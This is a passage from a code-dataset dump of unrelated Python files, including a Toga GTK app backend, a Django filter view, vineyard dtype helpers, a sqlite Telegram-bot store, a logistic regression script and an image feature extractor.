This can be fixed by\n # creating a symlink into the site-packages\n # Try creating a symlink to the system library location.\n # base_packages_dir is where the packages installed by the package manager\n # can be found.\n # gi_system_install_path is where gi can be found in the packages dir.\n # installer_command is the command the user can run to install gi.\n py_version = \"%d.%d\" % (sys.version_info.major, sys.version_info.minor)\n\n if sys.version_info.major == 3:\n if os.path.isdir('/usr/lib64/python%s/site-packages/' % (py_version,)):\n # Fedora\n base_packages_dir = '/usr/lib64/python%s/site-packages/' % (py_version,)\n gi_system_install_path = '/usr/lib64/python%s/site-packages/gi' % (py_version,)\n installer_command = 'dnf install pygobject3 python3-gobject'\n elif os.path.isdir('/usr/lib/python3/dist-packages/'):\n # Ubuntu, Debian\n base_packages_dir = '/usr/lib/python3/dist-packages/'\n gi_system_install_path = '/usr/local/lib/python3/dist-packages/gi'\n installer_command = 'apt-get install python3-gi'\n elif os.path.isdir('/usr/lib/python%s/site-packages/' % (py_version,)):\n # Arch\n base_packages_dir = '/usr/lib/python%s/site-packages/' % (py_version,)\n gi_system_install_path = '/usr/lib/python%s/site-packages/gi' % (py_version,)\n installer_command = 'pacman -S python-gobject'\n else:\n raise RuntimeError(\"Unable to locate your Python packages dir.\")\n else:\n raise RuntimeError(\"Toga requires Python 3.\")\n\n # Use the location of this package to guide us to\n # the location of the virtualenv.\n gi_symlink_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'gi')\n pygtkcompat_symlink_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'pygtkcompat')\n cairo_symlink_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'cairo')\n\n if gi_symlink_path == gi_system_install_path:\n # If we're not in a virtualenv, just raise the original import error.\n raise\n else:\n gi_path = os.path.join(base_packages_dir, 'gi')\n pygtkcompat_path = os.path.join(base_packages_dir, 'pygtkcompat')\n cairo_path = os.path.join(base_packages_dir, 'cairo')\n if os.path.exists(gi_path) and os.path.isdir(gi_path):\n\n # If we can identify the gi library, create a symlink to it.\n try:\n print(\"Creating symlink (%s & %s) to system GTK+ libraries...\" % (gi_symlink_path, pygtkcompat_symlink_path))\n os.symlink(gi_path, gi_symlink_path)\n os.symlink(pygtkcompat_path, pygtkcompat_symlink_path)\n\n try:\n print(\"Creating symlink (%s) to system Cairo libraries...\" % cairo_symlink_path)\n os.symlink(cairo_path, cairo_symlink_path)\n except OSError:\n # If we can't create the symlink, we'll get an error importing cairo;\n # report the error at time of use, rather than now.\n pass\n\n # The call to os.symlink will return almost immediately,\n # but for some reason, it may not be fully flushed to\n # the file system. One way to fix this is to start\n # the process again. This call to os.execl restarts the\n # program with the same arguments, replacing the original\n # operating system process.\n os.execl(sys.executable, sys.executable, *sys.argv)\n except OSError:\n raise RuntimeError(\"Unable to automatically create symlink to system Python GTK+ bindings.\")\n else:\n raise RuntimeError(\"Unable to locate the Python GTK+ bindings. 
Have you run '%s'?\" % installer_command)\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gio, GLib\n\n\nfrom toga.command import GROUP_BREAK, SECTION_BREAK, Command\nimport toga\nfrom .window import Window\nfrom toga import Icon\nfrom toga.handlers import wrapped_handler\n\nimport gbulb\n\n\nclass MainWindow(Window):\n _IMPL_CLASS = Gtk.ApplicationWindow\n\n def on_close(self, widget, data):\n pass\n\n\nclass App:\n \"\"\"\n Todo:\n * Creation of Menus is not working.\n * Disabling of menu items is not working.\n * App Icon is not showing up\n \"\"\"\n def __init__(self, interface):\n self.interface = interface\n self.interface._impl = self\n\n gbulb.install(gtk=True)\n self.loop = asyncio.get_event_loop()\n\n self.create()\n\n def create(self):\n Icon.app_icon = Icon.load(self.interface.icon, default=Icon.TIBERIUS_ICON)\n # Stimulate the build of the app\n self.native = Gtk.Application(application_id=self.interface.app_id, flags=Gio.ApplicationFlags.FLAGS_NONE)\n\n # Connect the GTK signal that will cause app startup to occur\n self.native.connect('startup', self.startup)\n self.native.connect('activate', self.activate)\n # self.native.connect('shutdown', self.shutdown)\n\n self.actions = None\n\n def startup(self, data=None):\n self.interface.commands.add(\n Command(None, 'About ' + self.interface.name, group=toga.Group.APP),\n Command(None, 'Preferences', group=toga.Group.APP),\n # Quit should always be the last item, in a section on it's own\n Command(lambda s: self.exit(), 'Quit ' + self.interface.name, shortcut='q', group=toga.Group.APP, section=sys.maxsize),\n Command(None, 'Visit homepage', group=toga.Group.HELP)\n )\n\n self.interface.startup()\n\n # Create the lookup table of menu items,\n # then force the creation of the menus.\n self._actions = {}\n self.create_menus()\n # self.interface.main_window._impl.create_toolbar()\n\n def activate(self, data=None):\n pass\n\n def open_document(self, fileURL):\n '''Add a new document to this app.'''\n print(\"STUB: If you want to handle opening documents, implement App.open_document(fileURL)\")\n\n def create_menus(self):\n # Only create the menu if the menu item index has been created.\n if hasattr(self, '_actions'):\n self._actions = {}\n menubar = Gio.Menu()\n label = None\n submenu = None\n section = None\n for cmd in self.interface.commands:\n if cmd == GROUP_BREAK:\n if section:\n submenu.append_section(None, section)\n\n if label == '*':\n self.native.set_app_menu(submenu)\n else:\n menubar.append_submenu(label, submenu)\n\n label = None\n submenu = None\n section = None\n elif cmd == SECTION_BREAK:\n submenu.append_section(None, section)\n section = None\n\n else:\n if submenu is None:\n label = cmd.group.label\n submenu = Gio.Menu()\n\n if section is None:\n section = Gio.Menu()\n\n try:\n action = self._actions[cmd]\n except KeyError:\n cmd_id = \"command-%s\" % id(cmd)\n action = Gio.SimpleAction.new(cmd_id, None)\n if cmd.action:\n action.connect(\"activate\", wrapped_handler(cmd, cmd.action))\n cmd._widgets.append(action)\n self._actions[cmd] = action\n self.native.add_action(action)\n\n # cmd.bind(self.interface.factory).set_enabled(cmd.enabled)\n\n item = Gio.MenuItem.new(cmd.label, 'app.' 
+ cmd_id)\n if cmd.shortcut:\n item.set_attribute_value('accel', GLib.Variant('s', '%s' % cmd.shortcut.upper()))\n\n # item.set_attribute_value('accel', GLib.Variant(cmd.shortcut, '%s' % cmd.shortcut.upper()))\n\n section.append_item(item)\n\n if section:\n submenu.append_section(None, section)\n\n if submenu:\n if label == '*':\n self.native.set_app_menu(submenu)\n else:\n menubar.append_submenu(label, submenu)\n\n # Set the menu for the app.\n self.native.set_menubar(menubar)\n\n def main_loop(self):\n # Modify signal handlers to make sure Ctrl-C is caught and handled.\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n self.loop.run_forever(application=self.native)\n\n def exit(self):\n self.native.quit()\n","sub_path":"src/gtk/toga_gtk/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346208570","text":"import random\n\ndef is_out_of_bounds(map_dim, pos_x, pos_y):\n return pos_x < 0 or pos_y < 0 or pos_x >= map_dim or pos_y >= map_dim\n\ndef is_cell_occupied(occupied_map, pos_x, pos_y):\n bounds_map = len(occupied_map)\n if is_out_of_bounds(bounds_map, pos_x, pos_y):\n return True\n elif occupied_map[pos_y][pos_x] <= 0:\n return False\n else:\n return True\n\ndef cells_around():\n dirs = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]\n random.shuffle(dirs, random.random)\n return dirs\n\ndef get_relative_karbonite_mine_positions(robot):\n pos_x = robot.me.x\n pos_y = robot.me.y\n karb_map = robot.get_karbonite_map()\n\n map_length = len(karb_map)\n queue = []\n distance = []\n\n for iter_i in range(map_length):\n for iter_j in range(map_length):\n if karb_map[iter_i][iter_j]:\n distance.append((iter_j - pos_x)**2 + (iter_i - pos_y)**2)\n queue.append((iter_j, iter_i))\n\n sorted_distance, sorted_tuple = insertionSort(distance, queue)\n return sorted_distance, sorted_tuple\n\ndef get_relative_fuel_mine_positions(robot):\n pos_x = robot.me.x\n pos_y = robot.me.y\n fuel_map = robot.get_fuel_map()\n\n map_length = len(fuel_map)\n queue = []\n distance = []\n\n for iter_i in range(map_length):\n for iter_j in range(map_length):\n if fuel_map[iter_i][iter_j]:\n distance.append((iter_j - pos_x)**2 + (iter_i - pos_y)**2)\n queue.append((iter_j, iter_i))\n\n sorted_distance, sorted_tuple = insertionSort(distance, queue)\n return sorted_distance, sorted_tuple\n\ndef get_relative_mine_positions(robot):\n pos_x = robot.me.x\n pos_y = robot.me.y\n fuel_map = robot.get_fuel_map()\n karb_map = robot.get_karbonite_map()\n\n map_length = len(fuel_map)\n queue = []\n distance = []\n\n for iter_i in range(map_length):\n for iter_j in range(map_length):\n if fuel_map[iter_i][iter_j] or karb_map[iter_i][iter_j]:\n distance.append((iter_j - pos_x)**2 + (iter_i - pos_y)**2)\n queue.append((iter_j, iter_i))\n\n sorted_distance, sorted_tuple = insertionSort(distance, queue)\n return sorted_distance, sorted_tuple\n\ndef insertionSort(alist, main_list):\n # Quick hack to guard against the conversion of elements into string while sorting\n for index in range(1, len(alist)):\n currentvalue = alist[index]\n currentvalue_ml = main_list[index]\n position = index\n while position > 0 and alist[position - 1] > currentvalue:\n alist[position] = alist[position-1]\n main_list[position] = main_list[position-1]\n position = position -1 \n alist[position] = currentvalue\n main_list[position] = currentvalue_ml\n return alist, main_list\n\ndef convert_to_decimal(binary_str: str) -> 
int:\n binary_str = \"0b\" + binary_str\n return int(binary_str, 2)\n\ndef convert_to_binary(dec: int) -> str:\n ary = [\"0\" for i in range(16)]\n itr = 15 # start from last index\n while dec != 0:\n rem = dec%2\n ary[itr] = str(rem)\n itr -= 1\n dec = dec // 2\n return \"\".join(ary)\n","sub_path":"bc19-scaffold/bots/11.FightingBot_Crusader/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136654895","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf8:\n\"\"\"\nClass-based django-filter generic view\n\n\nAUTHOR:\n lambdalisue[Ali su ae] (lambdalisue@hashnote.net)\n \nCopyright:\n Copyright 2011 Alisue allright reserved.\n\nLicense:\n Licensed under the Apache License, Version 2.0 (the \"License\"); \n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unliss required by applicable law or agreed to in writing, software\n distributed under the License is distrubuted on an \"AS IS\" BASICS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n__AUTHOR__ = \"lambdalisue (lambdalisue@hashnote.net)\"\nfrom django.http import Http404\nfrom django.views.generic import View\nfrom django.views.generic.list import MultipleObjectMixin\nfrom django.views.generic.list import MultipleObjectTemplateResponseMixin\n\nfrom django_filters.filterset import FilterSet\n\nclass BaseFilterView(MultipleObjectMixin, View):\n filter_class = None\n\n def get(self, request, *args, **kwargs):\n self.object_list = self.get_queryset()\n allow_empty = self.get_allow_empty()\n if not allow_empty and len(self.object_list) == 0:\n raise Http404(\n _(u\"Empty list and '%(class_name)s.allow empty' is \"\n u\"False.\") % {'class_name': self.__class__.__name__})\n context = self.get_context_data(request=request,\n object_list=self.object_list)\n return self.render_to_response(context)\n \n def get_filter_class(self):\n \"\"\"get filter_class\"\"\"\n if self.filter_class:\n return self.filter_class\n elif self.model:\n meta = type(\n 'Meta', (object,), {'model': self.model})\n return type(\n '%sFilterSet' % self.model._meta.object_name,\n (FilterSet,), {'Meta': meta})\n else:\n raise TypeError(\n u\"\"\"BaseFilterView must be used with either model or \"\"\"\n u\"\"\"filter_class\"\"\")\n\n def get_context_data(self, **kwargs):\n request = kwargs.pop('request')\n filter_class = self.get_filter_class()\n filterset = filter_class(request.GET or None, self.get_queryset())\n kwargs['filter'] = filterset\n return super(BaseFilterView, self).get_context_data(**kwargs)\n\nclass FilterView(MultipleObjectTemplateResponseMixin, BaseFilterView):\n \"\"\"\n Render some list of objects with filter, set by `self.model` or\n `self.queryset`.\n `self.queryset` can actually be any iterable of items, not just a queryset.\n \"\"\"\n template_name_suffix = '_filter'\n","sub_path":"django_filters/generic/classbased.py","file_name":"classbased.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603721894","text":"import os\nimport numpy as np\nfrom PIL import Image\n# root = '/TOSHIBA EXT/radar_data/train'\n\ndef image_save(name):\n\tI=Image.open(name)\n\timg=np.asarray(I)\n\t# 
img_save=np.zeros((501,501))\n\t# for i in range(500):\n\t# \tfor j in range(500):\n\t# \t\timg_save[i,j]=img[i,j,0]\n\treturn img\n\ndef npy(path):\n\tnpy=[]\n\tfor i in os.listdir(path):\n\t\timg = []\n\t\tfor j in os.listdir(path+i):\n\t\t\timg_j=image_save(path+i+'/'+j)\n\t\t\timg.append(img_j)\n\t\tnpy.append(img)\n\tnpy=np.array(npy)\n\treturn npy\n\npath='/Volumes/TOSHIBA EXT/radar_data/train/test/'\nimage_npy=npy(path)\nnp.save('/Volumes/TOSHIBA EXT/radar_data/train/npy/test.npy',image_npy)","sub_path":"code/Image_data_improve.py","file_name":"Image_data_improve.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381505606","text":"#coding: utf-8\nimport argparse\n\ndef parse_args():\n \n parser = argparse.ArgumentParser('test!!!')\n parser.add_argument('--infile', dest=\"data_file\", help='Input data JSON file.')\n parser.add_argument('--outfile', dest=\"result_file\", help='Output result Json file.')\n \n return parser.parse_args()\n\ndef main(args):\n \n data = open(args.infile,\"r\")\n result = open(args.outfile,\"w\")\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","sub_path":"阅读理解/model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"568853921","text":"\"\"\"\n1) 다음 list 에서 10 과 30 사이의 숫자 중 홀수만 골라 출력하라.\n xlist = [-5, 5, 10, 12, 13, 14, 15, 25, 30, 40, 55, 100]\n\"\"\"\nxlist = [-5, 5, 10, 12, 13, 14, 15, 25, 30, 40, 55, 100]\n\nfor n in xlist:\n if n >= 10 and n <= 30:\n if n % 2 == 1:\n print(n)\n\n\"\"\"\n2) 다음 영어 문장에서 너(you)는 몇번 나오는가 ?\n \"You don't go to school on Saturday. I want you be happy.\n I miss you very much. You don't forget me\"\n\"\"\"\ns = \"You don't go to school on Saturday. I want you be happy. I miss you very much. You don't forget me\"\n\ns = s.lower()\nprint(s.count(\"you\"))\n\n\"\"\"\n3) 파이썬 강좌의 수강생 목록은 다음과 같다. 
어떤 사람이 수강생 목록에 존재하는지\n check 하는 함수를 작성하라.\n 목록에 존재하면 True, 존재하지 않으면 False 를 반환한다.\n\n 학생부 : [\"김철수\", \"홍길동\", \"문재인\", \"김정은\", \"트럼프\", \"성춘향\"]\n\"\"\"\ndef check_list(lst, name):\n if name in lst:\n return True\n else:\n return False\n\nstudents = [\"김철수\", \"홍길동\", \"문재인\", \"김정은\", \"트럼프\", \"성춘향\"]\n\nprint(check_list(students, \"홍길동\"))\n\n\"\"\"\n4) 다음의 주민번호 리스트에서 남, 녀 별로 90 년생 이후 출생자를 골라내라.\n\"\"\"\nid_list = ['920801-1041798', '800902-2048746', '971010-1023987', '871203-2014987',\n '820801-1041798', '900902-2048746', '941010-1023987', '971203-2014987']\n\nman = []\nlady = []\n\nfor id in id_list:\n if id[:2] >= '90' and id[7] == '1':\n man.append(id)\n else:\n lady.append(id)\n\nprint('남성 =', man)\nprint('여성 =', lady)\n","sub_path":"chapter12_practice.py","file_name":"chapter12_practice.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"492369262","text":"def icmp(a,b):\n global s\n if s.index(a)<=s.index(b):\n return True\n else:\n return False\n\ndef strsort(l,r):\n if l>=r:\n return\n i=l\n j=r\n global t_in_s\n tmp=t_in_s[i]\n while(i x[1])',\n 'near((x[1]-0.25)*(x[1]-0.75), 0) && ((0.25-tol) < x[0]) && ((0.75+tol) > x[0])']\n walls = ['( %s )' % w for w in walls]\n \n chi = CompiledSubDomain(' || '.join(walls), tol=1E-10)\n surfaces = MeshFunction('size_t', omega, 2, 0)\n chi.mark(surfaces, 1)\n\n gamma = EmbeddedMesh(surfaces, 1)\n\n A = np.array([0.5, 0.5, 0.0])\n B = np.array([0.5, 0.5, 1.0]) \n lmbda = StraightLineMesh(A, B, 2*n) # The curve\n\n V3 = FunctionSpace(omega, 'CG', 1)\n V2 = FunctionSpace(gamma, 'CG', 2)\n V1 = FunctionSpace(lmbda, 'CG', 1)\n \n u1 = TrialFunction(V1)\n v3 = TestFunction(V3)\n\n dx_ = Measure('dx', domain=gamma)\n a = inner(Extension(u1, gamma, 'uniform'), Trace(v3, gamma))*dx_\n\n A = ii_assemble(a)\n\n # Now check action\n f1h = interpolate(f1, V1)\n x = A*f1h.vector()\n\n f3h = interpolate(f3, V3)\n result = f3h.vector().inner(x)\n\n true = assemble(inner(f3, f1)*dx_)\n\n error = abs(true - result)\n\n return gamma.hmin(), error, f3h\n\n# --------------------------------------------------------------------\n\nif __name__ == '__main__':\n from test_surf_avg import analyze_convergence\n from functools import partial\n import sympy as sp\n\n ns = (4, 8, 16, 32)\n \n # Exact, exact\n f3, f1 = Constant(2), Constant(3)\n get_error = partial(test_ET, f3=f3, f1=f1)\n rate, error = analyze_convergence(ns, get_error)[2:]\n assert error < 1E-12\n\n # Exact, exact\n f3, f1 = Expression('x[0] - x[2] + 2*x[1]', degree=3), Expression('x[2]', degree=1)\n get_error = partial(test_ET, f3=f3, f1=f1)\n rate, error = analyze_convergence(ns, get_error)[2:]\n assert error < 1E-12\n\n # Exact, exact\n f3, f1 = Expression('sin(pi*(x[0] - x[2] + 2*x[1]))', degree=3), Expression('sin(2*pi*x[2])', degree=3)\n get_error = partial(test_ET, f3=f3, f1=f1)\n rate, error = analyze_convergence(ns, get_error)[2:]\n assert rate > 1\n","sub_path":"src_lm3d1d/test_ET_coupling.py","file_name":"test_ET_coupling.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13512721","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2020-2023 Alibaba Group Holding Limited.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport json\nimport pickle\n\nimport numpy as np\nimport pyarrow as pa\n\nif pickle.HIGHEST_PROTOCOL < 5:\n import pickle5 as pickle # pylint: disable=import-error\n\n\ndef normalize_dtype(\n dtype, dtype_meta=None\n): # pylint: disable=too-many-return-statements\n '''Normalize a descriptive C++ type to numpy.dtype.'''\n if isinstance(dtype, np.dtype):\n return dtype\n if dtype in ['i32', 'int', 'int32', 'int32_t']:\n return np.dtype('int32')\n if dtype in ['u32', 'uint', 'uint_t', 'uint32', 'uint32_t']:\n return np.dtype('uint32')\n if dtype in [int, 'i64', 'int64', 'long long', 'int64_t']:\n return np.dtype('int64')\n if dtype in ['u64', 'uint64', 'uint64_t']:\n return np.dtype('uint64')\n if dtype in ['float32']:\n return np.dtype('float32')\n if dtype in ['float']:\n return np.dtype('float')\n if dtype in ['double', 'float64']:\n return np.dtype('double')\n if dtype.startswith('str'):\n return np.dtype(dtype_meta)\n return dtype\n\n\ndef normalize_cpptype(dtype): # pylint: disable=too-many-return-statements\n if dtype.name == 'int32':\n return 'int'\n if dtype.name == 'uint32':\n return 'uint32'\n if dtype.name == 'int64':\n return 'int64'\n if dtype.name == 'uint64':\n return 'uint64'\n if dtype.name == 'float32':\n return 'float'\n if dtype.name == 'float64':\n return 'double'\n return dtype.name\n\n\ndef normalize_arrow_dtype( # noqa: C901, pylint: disable=too-many-return-statements\n dtype,\n):\n if dtype in ['bool']:\n return pa.bool_()\n if dtype in ['int8_t', 'int8', 'byte']:\n return pa.int8()\n if dtype in ['uint8_t', 'uint8', 'char']:\n return pa.uint8()\n if dtype in ['int16_t', 'int16', 'short']:\n return pa.int16()\n if dtype in ['uint16_t', 'uint16']:\n return pa.uint16()\n if dtype in ['int32_t', 'int32', 'int']:\n return pa.int32()\n if dtype in ['uint32_t', 'uint32']:\n return pa.uint32()\n if dtype in ['int64_t', 'int64', 'long']:\n return pa.int64()\n if dtype in ['uint64_t', 'uint64']:\n return pa.uint64()\n if dtype in ['half']:\n return pa.float16()\n if dtype in ['float', 'float32']:\n return pa.float32()\n if dtype in ['double', 'float64']:\n return pa.float64()\n if dtype in [\n 'string',\n 'std::string',\n 'std::__1::string',\n 'std::__cxx11::string',\n 'str',\n ]:\n return pa.large_string()\n if dtype in ['large_list']:\n return pa.large_list(pa.int32())\n if dtype in ['large_list']:\n return pa.large_list(pa.uint32())\n if dtype in ['large_list']:\n return pa.large_list(pa.int64())\n if dtype in ['large_list']:\n return pa.large_list(pa.uint64())\n if dtype in ['large_list']:\n return pa.large_list(pa.float())\n if dtype in ['large_list']:\n return pa.large_list(pa.double())\n if dtype in ['null', 'NULL', 'None', None]:\n return pa.null()\n raise ValueError('Unsupported data type: %s' % dtype)\n\n\ndef build_buffer(client, address, size):\n if size == 0:\n return client.create_empty_blob()\n existing = 
client.find_shared_memory(address)\n if existing is not None:\n return client.get_meta(existing)\n buffer = client.create_blob(size)\n buffer.copy(0, address, size)\n return buffer.seal(client)\n\n\ndef build_numpy_buffer(client, array):\n if array.dtype.name != 'object':\n if not array.flags['C_CONTIGUOUS']:\n array = np.ascontiguousarray(array)\n address, _ = array.__array_interface__['data']\n return build_buffer(client, address, array.nbytes)\n else:\n payload = pickle.dumps(array, protocol=5)\n buffer = client.create_blob(len(payload))\n buffer.copy(0, payload)\n return buffer.seal(client)\n\n\ndef default_json_encoder(value):\n if isinstance(value, (np.integer, np.floating)):\n return value.item()\n raise TypeError\n\n\ndef to_json(value):\n return json.dumps(value, default=default_json_encoder)\n\n\ndef from_json(string):\n return json.loads(string)\n\n\ndef expand_slice(indexer):\n if isinstance(indexer, slice):\n return range(indexer.start, indexer.stop, indexer.step)\n else:\n return indexer\n\n\ndef str_to_bool(s):\n if s is None:\n return False\n if not isinstance(s, str):\n s = str(s)\n return s.lower() in [\n 'true',\n '1',\n 't',\n 'y',\n 'yes',\n 'yeah',\n 'yup',\n 'certainly',\n 'uh-huh',\n ]\n\n\n__all__ = [\n 'normalize_dtype',\n 'normalize_cpptype',\n 'normalize_arrow_dtype',\n 'build_buffer',\n 'build_numpy_buffer',\n 'to_json',\n 'from_json',\n 'expand_slice',\n 'str_to_bool',\n]\n","sub_path":"python/vineyard/data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219023458","text":"import sqlite3\r\nimport datetime\r\n\r\ndef new_base():\r\n connect = sqlite3.connect('new_base3.db')\r\n cursor = connect.cursor()\r\n connect.commit()\r\n return cursor, connect\r\n\r\n\r\ndef table_user(message, name, email, phone):\r\n cursor, connect = new_base()\r\n user_id = message.chat.id\r\n cursor.execute(\"INSERT INTO users VALUES(?, ?, ?, ?)\", (user_id, name, email, phone))\r\n connect.commit()\r\n\r\ndef check_in_field(user_id):\r\n cursor, connect = new_base()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS users( \r\n id integer PRIMARY KEY,\r\n name_user text,\r\n email_user text,\r\n phone_user text\r\n )\"\"\")\r\n connect.commit()\r\n cursor.execute(f\"SELECT id FROM users WHERE ID = {int(user_id)}\")\r\n data = cursor.fetchone()\r\n return data\r\n\r\ndef table_data_user(message, org_inn, photo_1, photo_2, doc_pers_data):\r\n cursor, connect = new_base()\r\n cursor.execute(\"\"\"PRAGMA foreign_keys=ON\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS data_user(\r\n chat_id INTEGER,\r\n date TEXT,\r\n time TEXT,\r\n org_inn TEXT,\r\n photo_passport_1 BLOB, \r\n photo_passport_2 BLOB,\r\n doc_personal_data BLOB,\r\n FOREIGN KEY (chat_id) REFERENCES users(id)\r\n )\"\"\")\r\n\r\n user_id = message.chat.id\r\n dt_obj= datetime.datetime.now()\r\n dt_string = dt_obj.strftime(\"%d-%b-%Y %H:%M:%S\")\r\n date_now = str(dt_string.split()[0])\r\n time_now = str(dt_string.split()[1])\r\n cursor.execute(\"INSERT INTO data_user VALUES(?, ?, ?, ?, ?, ?, ?)\", (user_id,date_now ,time_now, org_inn, photo_1, photo_2, doc_pers_data))\r\n connect.commit()\r\n\r\n\r\n\r\n\r\n","sub_path":"tg_bot/data_base.py","file_name":"data_base.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247906944","text":"import numpy\nimport sys\n\nclass 
two_set_classify:\n \n train = []\n test = []\n w = [0.]*57\n b = 0.\n feature_name = []\n feature = [[0 for x in range(4001)] for y in range(57)]\n classify = [0.]*4001\n\n def read_train(self,file_name):\n with open(file_name) as data_file:\n for line in data_file:\n self.train.append(line.strip().split(','))\n data_file.close()\n for i in range (4001):\n for j in range (57):\n self.feature[j][i]=self.train[i][j+1]\n self.classify[i] = self.train[i][58]\n \n\n def f_wb(self,x):\n z = 0.\n for j in range (57):\n z=z+self.w[j]*float(x[j])\n z=z+self.b\n f_wb=1/(1+numpy.exp(-z))\n return(f_wb) \n \n def logistic_regression(self,n,eta):\n for i in range(n):\n S=[1.]*57\n for j in range (57):\n s=0.\n for k in range(4001):\n s=s+(float(self.classify[k])-self.f_wb(self.train[k][1:58]))*float(self.train[k][j+1])\n S[j]=S[j]+s*s\n self.w[j]=self.w[j]+eta*(1.0/(S[j]**0.5))*s\n\n def write_w(self,file_name):\n f = open(file_name, 'w+')\n for i in range(57):\n f.write(str(self.w[i]))\n f.write('\\n')\n f.close()\n \n def output(self,input_file,output_file):\n with open(input_file) as data_file:\n for i, line in enumerate(data_file):\n self.w[i]=float(line)\n data_file.close()\n f = open(output_file, 'w+')\n f.write('id,label\\n')\n for k in range(600):\n f.write(str(k+1))\n f.write(',')\n if(self.f_wb(self.test[k][1:58])>0.5):\n f.write('1\\n')\n else:\n f.write('0\\n')\n f.close()\n\nmodel = two_set_classify()\nmodel.read_train(sys.argv[1])\nmodel.logistic_regression(110, 5)\nmodel.write_w(sys.argv[2])\n\n\n\n","sub_path":"hw2/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219847002","text":"import sys,os\nsys.path.append(os.path.abspath('..')) \nfrom Base import BaseProcessor\nclass ImageFeatureExtractor(BaseProcessor.BaseProcessor):\n def __init__(self, config, DBP):\n super(ImageFeatureExtractor, self).__init__()\n sys.path.append(os.path.abspath('..'))\n self.config = config\n self.DBP = DBP\n\n def checkDBP(self):\n DBP_info = self.DBP.project_name+'; '\n DBP_info +=self.DBP.subtask_name+'; '\n DBP_info +=self.DBP.configTableName+'; '\n DBP_info +=self.DBP.metaDataTableName+'; '\n DBP_info +=self.DBP.apkTreeTableName +'; '\n DBP_info +=self.DBP.rawApkForestName+'; '\n print(DBP_info)\n\n def info(self):\n info='''\n Desc:\n 提取特征模块,从生成好的应用树中得到图片路径对其提取特征\n transform csv records to dicts\n \n feed meanful record\n write dicts file\n show dicts length\n \n methods list:\n def runTransform(self,operator='',params=[]):\n if operator == 'extif':\n Example:\n IF extif spm\n IF extif hog\n\n Update:\n 使用queryAllPath中获取图片的id-path对,该id-path对相当于mRNA\n 依据该mRNA对该id-path对进行翻译,生成pictureList相当于pro.\n 最后对pictureList进行特征提取,转存到文件中\n '''\n print(info)\n def transcription(self):\n import numpy as np\n idUpath = self.DBP.queryAllPath()\n path = np.array(idUpath)[:,1] # 取半条链作为mRNA\n path = [self.config['INPUT_DATA_DIR'] + x for x in path]\n return path #最后返回的是list型\n\n\n def extractHOG(self,pictureList,size):\n # S3 获取图片的方向梯度直方图\n def getHOG(picture):\n from skimage import feature as ft\n from skimage import io\n features,hogImage = ft.hog(picture, orientations=9, pixels_per_cell=(16, 16), cells_per_block=(2, 2), visualize=True)\n #io.imshow(hogImage)\n #io.show()\n return features\n\n featureList = []\n for picture in pictureList:\n featureList.append(getHOG(picture.reshape(size)))\n\n return featureList\n \n #extractIF:提取图像特征\n def 
extractIF(self,method,pictureList,size): \n extractIFFun = ''\n if method == 'hog':\n return self.extractHOG(pictureList,size)\n elif method =='hsv':\n # S4 获取图片的颜色直方图\n pass\n elif method == 'spm':\n #from . import spm\n from ImageFeatureExtract.spm import spm\n from importlib import reload\n reload(spm)\n return spm.getSPM(pictureList,self.config['SPM_CODE_BOOK_PATH']) \n elif method == 'scspm':\n from scspm import scspm\n from importlib import reload\n reload(scspm)\n return scspm.getSCSPM(pictureList,self.config['SPM_CODE_BOOK_PATH']) \n elif method == 'cnn-resnet':\n from ImageFeatureExtract.cnn import testResnetFeatureExtractor\n from importlib import reload\n reload(testResnetFeatureExtractor)\n return testResnetFeatureExtractor.runExtract(pictureList)\n elif method == 'cnn-densnet':\n from ImageFeatureExtract.cnn import testDensnetFeatureExtractor\n from importlib import reload\n reload(testDensnetFeatureExtractor)\n return 